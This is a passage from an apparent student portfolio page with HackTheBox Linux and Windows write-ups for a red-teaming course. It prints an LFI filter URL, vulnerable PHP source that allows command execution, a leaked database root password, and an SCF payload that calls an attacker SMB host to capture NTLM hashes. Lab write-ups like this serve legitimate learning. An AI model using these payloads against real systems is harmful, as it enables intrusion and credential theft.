          <a href="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png" alt=""></a>
          <p>Lets try to run Dirbuster one more time to see if it finds anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/Dirbuster.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Dirbuster.png" alt=""></a>
          <p>Almost forgot we have to add the PHPSESSID from this admin to Dirbuster otherwise it
          won't have access to enumerate the site.</p>
          <a href="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png" alt=""></a>
          <p>Dirtbuster found a file called /actions/file.php which could be interesting. By the looks
          of it this is the file that is running on the homepage of this subdomain as well but
          there it said it didn't have a GUI yet. Maybe we can use it without GUI now we know the
          location of the file. But we need to know the command because now it gives us an
          error.</p>
          <a href="img/portfolio/minor/red/htb_linux/SpecifyFile.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SpecifyFile.png" alt=""></a>
          <p>Lets try some common command in this context like file, path and filepath. Hey! Filepath
          worked and now we can execute files and apparently also the hashingTool that is also on
          the homepage.</p>
          <a href="img/portfolio/minor/red/htb_linux/FileExecuted.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FileExecuted.png" alt=""></a>
          <p>Lets take a look at LFI (Local File Inclusion) and see if we can do something with that.
          I've found this <a href="https://medium.com/@nyomanpradipta120/local-file-inclusion-vulnerability-cfd9e62d12cb">website</a>
          that explains a LFI vulnerability we could try</p>
          <code>https://dev.earlyaccess.htb/actions/file.php?filepath=php://filter/convert.base64-encode/resource=/var/www/earlyaccess.htb/dev/actions/hash.php</code>
          <a href="img/portfolio/minor/red/htb_linux/HashBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashBase64.png" alt=""></a>
          <p>This gave us the base64 of the hash.php file if we can convert it back to code we might
          be able to find a vulnerability.</p>
          <a href="img/portfolio/minor/red/htb_linux/DecodedBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DecodedBase64.png" alt=""></a>
          <p>Using an online base64 decoder we managed to find the source code of the hash.php
          file.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              &#x3C;?php
                                              include_once "../includes/session.php";
          
                                              function hash_pw($hash_function, $password)
                                              {
                                                  // DEVELOPER-NOTE: There has gotta be an easier way...
                                                  ob_start();
                                                  // Use inputted hash_function to hash password
                                                  $hash = @$hash_function($password);
                                                  ob_end_clean();
                                                  return $hash;
                                              }
          
                                              try
                                              {
                                                  if(isset($_REQUEST['action']))
                                                  {
                                                      if($_REQUEST['action'] === "verify")
                                                      {
                                                          // VERIFIES $password AGAINST $hash
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['hash']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
          
                                                              $_SESSION['verify'] = ($hash === $_REQUEST['hash']);
                                                              header('Location: /home.php?tool=hashing');
                                                              return;
                                                          }
                                                      }
                                                      elseif($_REQUEST['action'] === "verify_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE VERIFICATION
                                                      }
                                                      elseif($_REQUEST['action'] === "hash_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE-HASHING
                                                      }
                                                      elseif($_REQUEST['action'] === "hash")
                                                      {
                                                          // HASHES $password USING $hash_function
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
                                                              if(!isset($_REQUEST['redirect']))
                                                              {
                                                                  echo "Result for Hash-function (" . $_REQUEST['hash_function'] . ") and password (" . $_REQUEST['password'] . "):&#x3C;br>";
                                                                  echo '&#x3C;br>' . $hash;
                                                                  return;
                                                              }
                                                              else
                                                              {
                                                                  $_SESSION['hash'] = $hash;
                                                                  header('Location: /home.php?tool=hashing');
                                                                  return;
                                                              }
                                                          }
                                                      }
                                                  }
                                                  // Action not set, ignore
                                                  throw new Exception("");
                                              }
                                              catch(Exception $ex)
                                              {
                                                  if($ex->getMessage() !== "")
                                                      $_SESSION['error'] = htmlentities($ex->getMessage());
          
                                                  header('Location: /home.php');
                                                  return;
                                              }
                                              ?>
                                          </code>
                                      </pre>
          <p>After analyzing the source code it looks like if you send the debug parameter as true and
          the hashing_function as shell_exec, you
          can run any shell command you want from the hashing tool. So lets try that.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png" alt=""></a>
          <p>Looks like it worked now lets try to get a reverse shell.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WWW-DataShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-DataShell.png" alt=""></a>
          <p>And we're in! I looked in the /etc/passwd and noticed another user named www-adm which
          looked like the next user I needed. After looking around for a bit and I couldn't find
          anything I thought what if they reused passwords?</p>
          <a href="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png" alt=""></a>
          <p>And they did so now we have www-adm shell. After looking around I noticed a .wgetrc file
          with some credentials in it. Because it looked like docker was running on the machine I
          thought http://api:5000/ was my best bet.</p>
          <a href="img/portfolio/minor/red/htb_linux/WGETAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETAPI.png" alt=""></a>
          <p>And it was! Apparently there is a check_db endpoint but it required credentials. So I
          tried to credentials we've just found.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatCheckDB.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatCheckDB.png" alt=""></a>
          <p>Looks like JSON but we first need to prettify it to make it more readable.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              {
             "message":{
                "AppArmorProfile":"docker-default",
                "Args":[
                   "--character-set-server=utf8mb4",
                   "--collation-server=utf8mb4_bin",
                   "--skip-character-set-client-handshake",
                   "--max_allowed_packet=50MB",
                   "--general_log=0",
                   "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                ],
                "Config":{
                   "AttachStderr":false,
                   "AttachStdin":false,
                   "AttachStdout":false,
                   "Cmd":[
                      "--character-set-server=utf8mb4",
                      "--collation-server=utf8mb4_bin",
                      "--skip-character-set-client-handshake",
                      "--max_allowed_packet=50MB",
                      "--general_log=0",
                      "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                   ],
                   "Domainname":"",
                   "Entrypoint":[
                      "docker-entrypoint.sh"
                   ],
                   "Env":[
                      "MYSQL_DATABASE=db",
                      "MYSQL_USER=drew",
                      "MYSQL_PASSWORD=drew",
                      "MYSQL_ROOT_PASSWORD=XeoNu86JTznxMCQuGHrGutF3Csq5",
                      "SERVICE_TAGS=dev",
                      "SERVICE_NAME=mysql",
                      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
                      "GOSU_VERSION=1.12",
                      "MYSQL_MAJOR=8.0",
                      "MYSQL_VERSION=8.0.25-1debian10"
                   ],
                   "ExposedPorts":{
                      "3306/tcp":{
          
                      },
                      "33060/tcp":{
          
                      }
                   },
                   "Healthcheck":{
                      "Interval":5000000000,
                      "Retries":3,
                      "Test":[
                         "CMD-SHELL",
                         "mysqladmin ping -h 127.0.0.1 --user=$MYSQL_USER -p$MYSQL_PASSWORD --silent"
                      ],
                      "Timeout":2000000000
                   },
                   "Hostname":"mysql",
                   "Image":"mysql:latest",
                   "Labels":{
                      "com.docker.compose.config-hash":"947cb358bc0bb20b87239b0dffe00fd463bd7e10355f6aac2ef1044d8a29e839",
                      "com.docker.compose.container-number":"1",
                      "com.docker.compose.oneoff":"False",
                      "com.docker.compose.project":"app",
                      "com.docker.compose.project.config_files":"docker-compose.yml",
                      "com.docker.compose.project.working_dir":"/root/app",
                      "com.docker.compose.service":"mysql",
                      "com.docker.compose.version":"1.29.1"
                   },
                   "OnBuild":null,
                   "OpenStdin":false,
                   "StdinOnce":false,
                   "Tty":true,
                   "User":"",
                   "Volumes":{
                      "/docker-entrypoint-initdb.d":{
          
                      },
                      "/var/lib/mysql":{
          
                      }
                   },
                   "WorkingDir":""
                },
                "Created":"2021-10-04T06:57:43.698655618Z",
                "Driver":"overlay2",
                "ExecIDs":null,
                "GraphDriver":{
                   "Data":{
                      "LowerDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d-init/diff:/var/lib/docker/overlay2/ecc064365b0367fc58ac796d9d5fe020d9453c68e2563f8f6d4682e38231083e/diff:/var/lib/docker/overlay2/4a21c5c296d0e6d06a3e44e3fa4817ab6f6f8c3612da6ba902dc28ffd749ec4d/diff:/var/lib/docker/overlay2/f0cdcc7bddc58609f75a98300c16282d8151ce18bd89c36be218c52468b3a643/diff:/var/lib/docker/overlay2/01e8af3c602aa396e4cb5af2ed211a6a3145337fa19b123f23e36b006d565fd0/diff:/var/lib/docker/overlay2/55b88ae64530676260fe91d4d3e6b0d763165505d3135a3495677cb10de74a66/diff:/var/lib/docker/overlay2/4064491ac251bcc0b677b0f76de7d5ecf0c17c7d64d7a18debe8b5a99e73e127/diff:/var/lib/docker/overlay2/a60c199d618b0f2001f106393236ba394d683a96003a4e35f58f8a7642dbad4f/diff:/var/lib/docker/overlay2/29b638dc55a69c49df41c3f2ec0f90cc584fac031378ae455ed1458a488ec48d/diff:/var/lib/docker/overlay2/ee59a9d7b93adc69453965d291e66c7d2b3e6402b2aef6e77d367da181b8912f/diff:/var/lib/docker/overlay2/4b5204c09ec7b0cbf22d409408529d79a6d6a472b3c4d40261aa8990ff7a2ea8/diff:/var/lib/docker/overlay2/8178a3527c2a805b3c2fe70e179797282bb426f3e73e8f4134bc2fa2f2c7aa22/diff:/var/lib/docker/overlay2/76b10989e43e43406fc4306e789802258e36323f7c2414e5e1242b6eab4bd3eb/diff",
                      "MergedDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/merged",
                      "UpperDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/diff",
                      "WorkDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/work"
                   },
                   "Name":"overlay2"
                },
                "HostConfig":{
                   "AutoRemove":false,
                   "Binds":[
                      "/root/app/scripts/init.d:/docker-entrypoint-initdb.d:ro",
                      "app_vol_mysql:/var/lib/mysql:rw"
                   ],
                   "BlkioDeviceReadBps":null,
                   "BlkioDeviceReadIOps":null,
                   "BlkioDeviceWriteBps":null,
                   "BlkioDeviceWriteIOps":null,
                   "BlkioWeight":0,
                   "BlkioWeightDevice":null,
                   "CapAdd":[
                      "SYS_NICE"
                   ],
                   "CapDrop":null,
                   "Cgroup":"",
                   "CgroupParent":"",
                   "CgroupnsMode":"host",
                   "ConsoleSize":[
                      0,
                      0
                   ],
                   "ContainerIDFile":"",
                   "CpuCount":0,
                   "CpuPercent":0,
                   "CpuPeriod":0,
                   "CpuQuota":0,
                   "CpuRealtimePeriod":0,
                   "CpuRealtimeRuntime":0,
                   "CpuShares":0,
                   "CpusetCpus":"",
                   "CpusetMems":"",
                   "DeviceCgroupRules":null,
                   "DeviceRequests":null,
                   "Devices":null,
                   "Dns":null,
                   "DnsOptions":null,
                   "DnsSearch":null,
                   "ExtraHosts":null,
                   "GroupAdd":null,
                   "IOMaximumBandwidth":0,
                   "IOMaximumIOps":0,
                   "IpcMode":"private",
                   "Isolation":"",
                   "KernelMemory":0,
                   "KernelMemoryTCP":0,
                   "Links":null,
                   "LogConfig":{
                      "Config":{
          
                      },
                      "Type":"json-file"
                   },
                   "MaskedPaths":[
                      "/proc/asound",
                      "/proc/acpi",
                      "/proc/kcore",
                      "/proc/keys",
                      "/proc/latency_stats",
                      "/proc/timer_list",
                      "/proc/timer_stats",
                      "/proc/sched_debug",
                      "/proc/scsi",
                      "/sys/firmware"
                   ],
                   "Memory":0,
                   "MemoryReservation":0,
                   "MemorySwap":0,
                   "MemorySwappiness":null,
                   "NanoCpus":0,
                   "NetworkMode":"app_nw",
                   "OomKillDisable":false,
                   "OomScoreAdj":0,
                   "PidMode":"",
                   "PidsLimit":null,
                   "PortBindings":{
          
                   },
                   "Privileged":false,
                   "PublishAllPorts":false,
                   "ReadonlyPaths":[
                      "/proc/bus",
                      "/proc/fs",
                      "/proc/irq",
                      "/proc/sys",
                      "/proc/sysrq-trigger"
                   ],
                   "ReadonlyRootfs":false,
                   "RestartPolicy":{
                      "MaximumRetryCount":0,
                      "Name":"always"
                   },
                   "Runtime":"runc",
                   "SecurityOpt":null,
                   "ShmSize":67108864,
                   "UTSMode":"",
                   "Ulimits":null,
                   "UsernsMode":"",
                   "VolumeDriver":"",
                   "VolumesFrom":[
          
                   ]
                },
                "HostnamePath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hostname",
                "HostsPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hosts",
                "Id":"47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216",
                "Image":"sha256:5c62e459e087e3bd3d963092b58e50ae2af881076b43c29e38e2b5db253e0287",
                "LogPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216-json.log",
                "MountLabel":"",
                "Mounts":[
                   {
                      "Destination":"/docker-entrypoint-initdb.d",
                      "Mode":"ro",
                      "Propagation":"rprivate",
                      "RW":false,
                      "Source":"/root/app/scripts/init.d",
                      "Type":"bind"
                   },
                   {
                      "Destination":"/var/lib/mysql",
                      "Driver":"local",
                      "Mode":"rw",
                      "Name":"app_vol_mysql",
                      "Propagation":"",
                      "RW":true,
                      "Source":"/var/lib/docker/volumes/app_vol_mysql/_data",
                      "Type":"volume"
                   }
                ],
                "Name":"/mysql",
                "NetworkSettings":{
                   "Bridge":"",
                   "EndpointID":"",
                   "Gateway":"",
                   "GlobalIPv6Address":"",
                   "GlobalIPv6PrefixLen":0,
                   "HairpinMode":false,
                   "IPAddress":"",
                   "IPPrefixLen":0,
                   "IPv6Gateway":"",
                   "LinkLocalIPv6Address":"",
                   "LinkLocalIPv6PrefixLen":0,
                   "MacAddress":"",
                   "Networks":{
                      "app_nw":{
                         "Aliases":[
                            "47c78eb0450f",
                            "mysql"
                         ],
                         "DriverOpts":null,
                         "EndpointID":"50037fb137fd880f88a9efd17eb8cf94bf8142ec263080b4c904afeeaa79aa2e",
                         "Gateway":"172.18.0.1",
                         "GlobalIPv6Address":"",
                         "GlobalIPv6PrefixLen":0,
                         "IPAMConfig":{
                            "IPv4Address":"172.18.0.100"
                         },
                         "IPAddress":"172.18.0.100",
                         "IPPrefixLen":16,
                         "IPv6Gateway":"",
                         "Links":null,
                         "MacAddress":"02:42:ac:12:00:64",
                         "NetworkID":"021b24b8b3e1e3638463eeb7dc9af59c36cc412578cdf51931a24f04ea6f5532"
                      }
                   },
                   "Ports":{
                      "3306/tcp":null,
                      "33060/tcp":null
                   },
                   "SandboxID":"99cbb57fded2142e5dad46330b43249d2866f8514fb4342d06322f3e3b5c60f1",
                   "SandboxKey":"/var/run/docker/netns/99cbb57fded2",
                   "SecondaryIPAddresses":null,
                   "SecondaryIPv6Addresses":null
                },
                "Path":"docker-entrypoint.sh",
                "Platform":"linux",
                "ProcessLabel":"",
                "ResolvConfPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/resolv.conf",
                "RestartCount":0,
                "State":{
                   "Dead":false,
                   "Error":"",
                   "ExitCode":0,
                   "FinishedAt":"0001-01-01T00:00:00Z",
                   "Health":{
                      "FailingStreak":0,
                      "Log":[
                         {
                            "End":"2021-10-04T17:08:01.998027574+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:01.908189033+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:07.080804898+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:07.000613396+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:12.166584919+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:12.083845791+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:17.254375293+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:17.16894306+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:22.350400823+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:22.257747436+02:00"
                         }
                      ],
                      "Status":"healthy"
                   },
                   "OOMKilled":false,
                   "Paused":false,
                   "Pid":1108,
                   "Restarting":false,
                   "Running":true,
                   "StartedAt":"2021-10-04T06:57:47.409835076Z",
                   "Status":"running"
                }
             },
             "status":200
          }
                                          </code>
                                      </pre>
          <p>Looks like an username and some passwords lets try those with ssh.</p>
          <a href="img/portfolio/minor/red/htb_linux/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/UserFlag.png" alt=""></a>
          <p>We got the user flag! But now we need to find something to escalate our privileges. We
          could use LinPEAS to try and find something but we first have to get it on this
          machine.</p>
          <a href="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WGETLinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETLinpeas.png" alt=""></a>
          <p>I used SimpleHTTPServer to get LinPeas from my machine to the target machine because the
          target machine didn't have access to the internet. Now we need to run LinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasMail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasMail.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png" alt=""></a>
          <p>Looks like LinPEAS found some interesting stuff like a mail message to Drew and the
          docker ip ranges and a docker folder that is edited regularly.</p>
          <a href="img/portfolio/minor/red/htb_linux/Mail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Mail.png" alt=""></a>
          <p>This probably means that the docker folder that gets edited regularly is the folder
          containing the game. And that some script is running that we could use.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>Looks like we got a public key as game-tester as well. Lets try to login into the docker
          ips using this public key.</p>
          <a href="img/portfolio/minor/red/htb_linux/Game-testerShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Game-testerShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png" alt=""></a>
          <p>And it worked now we got a shell as game-tester as well on a docker container. I noticed
          that the same docker folder on Drew also exists on the docker container and that they
          are shared. I also noticed that the docker folder get rewritten entirely so all files
          inside get removed and replaced before the server is restarted again. Lets see what the
          script does.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatNode-server.png" alt=""></a>
          <p>It runs in a folder called /usr/src/app which doesn't exist on the Drew user but it does
          on the game-tester container. So lets look at that as well.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatServerJS.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatServerJS.png" alt=""></a>
          <p>Look like we can crash the server if we make a POST to autoplay with a decimal instead of
          an integer. But that doesn't get us anywhere we need to infect the node-server.sh
          first.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>I found this <a href="https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout">website</a>
          explaining priv esc with docker so I gave it a try. But I have to be faster than the
          server can create the node-server.sh in order to infect it. So I created a script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RogueNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RogueNode-server.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/ExploitLoop.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitLoop.png" alt=""></a>
          <p>This should create a bash file in /tmp on the game-tester container that is executable by
          game-tester in order to priv esc. So lets crash the server and try it.</p>
          <a href="img/portfolio/minor/red/htb_linux/ExploitRun.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitRun.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/CrashGameServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CrashGameServer.png" alt=""></a>
          <p>I had to give it a few tries in order to succeed because in some cases the server was
          actually faster than my script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RootOnDocker.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootOnDocker.png" alt=""></a>
          <p>And it worked now we need to do the same thing in order to get root on the Drew machine
          but this time we don't have to worry about speed because we don't need to infect a
          script, we just have to do it fast enough before all the files inside the folder get
          deleted again.</p>
          <a href="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootFlag.png" alt=""></a>
          <p>That's it! We are root and got the flag!</p>
          <p>Although it took me quite a while to root this machine it was a really fun one.
          Containing a lot of different exploits mostly straight from the OWASP top 10 but also
          some I never heard of before like the docker priv esc.</p>
           <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal22" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Windows Write-up</p>
          <a href="img/portfolio/minor/red/htb_windows/DriverCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/DriverCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <a href="img/portfolio/minor/red/htb_windows/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/NMapOutput.png" alt=""></a>
          <p>When navigating to the webpage we are greeted by a login screen. After some searching and
          not finding anything useful I tried to login with just a default password admin:admin it
          was a longshot but it worked!</p>
          <a href="img/portfolio/minor/red/htb_windows/Dashboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/Dashboard.png" alt=""></a>
          <p>The only button that worked on the website was Firmware updates where you can upload a
          file. Knowing that SMB was also an open port I found this <a href="https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/">website</a>
          this could potentially it so lets try it out.
          </p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              [Shell]
                                              Command=2
                                              Iconfile=\\10.10.14.161\share\test.ico
                                              [Taskbar]
                                              Command=ToggleDesktop
                                          </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_windows/ResponderOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ResponderOutput.png" alt=""></a>
          <p>I created a payload like the example given on the site I found started responder and got
          a few hits. Now we know the username and maybe the password if we manage to crack
          it. We know from the responder output that it is a NTLM hash so lets put Hashcat on it
          and see what we'll get.</p>
          <a href="img/portfolio/minor/red/htb_windows/HashcatOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/HashcatOutput.png" alt=""></a>
          <p>Hashcat cracked the password with ease and now we can take a look at the SMB folder to
          see if we can find anything interesting.</p>
          <a href="img/portfolio/minor/red/htb_windows/SMBMap.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SMBMap.png" alt=""></a>
          <p>We didn't find anything interesting but knowing from the NMap output we also know that
          the RDP port is open so maybe it uses the same password.</p>
          <a href="img/portfolio/minor/red/htb_windows/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/UserFlag.png" alt=""></a>
          <p>This was indeed the case and now we already have the user flag. For priv esc running at
          least WinPEAS is a no-brainer. So I used SimpleHTTPServer to get WinPEAS on the target
          machine.</p>
          <a href="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/WgetWinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetWinpeas.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png" alt=""></a>
          <p>Really the only interesting thing WinPEAS found was a Print spooler process. After some
          Googling I stubled across <a href="https://github.com/calebstewart/CVE-2021-1675">this</a> CVE. So lets get
          that exploit on the target machine in the same way we did with WinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png" alt=""></a>
          <p>I wasn't able to run the script because of some permission issues, but after some
          Googling I found out I could just set the policy to unrestricted.</p>
          <a href="img/portfolio/minor/red/htb_windows/RunExploit.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RunExploit.png" alt=""></a>
          <p>I ran the exploit and it created a new administrator account for me with a username and
          password that I chose and know. Now the only thing that's left is just to logout as this
           user and login with our new user.</p>
          <a href="img/portfolio/minor/red/htb_windows/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RootFlag.png" alt=""></a>
          <p>And that's it! We have the root flag! This box wasn't that hard but still fun and
          sometimes challenging due to my lack of knowledge of Windows hacking. Overall a fun
          learning experience.</p>
          <ul class="list-inline">
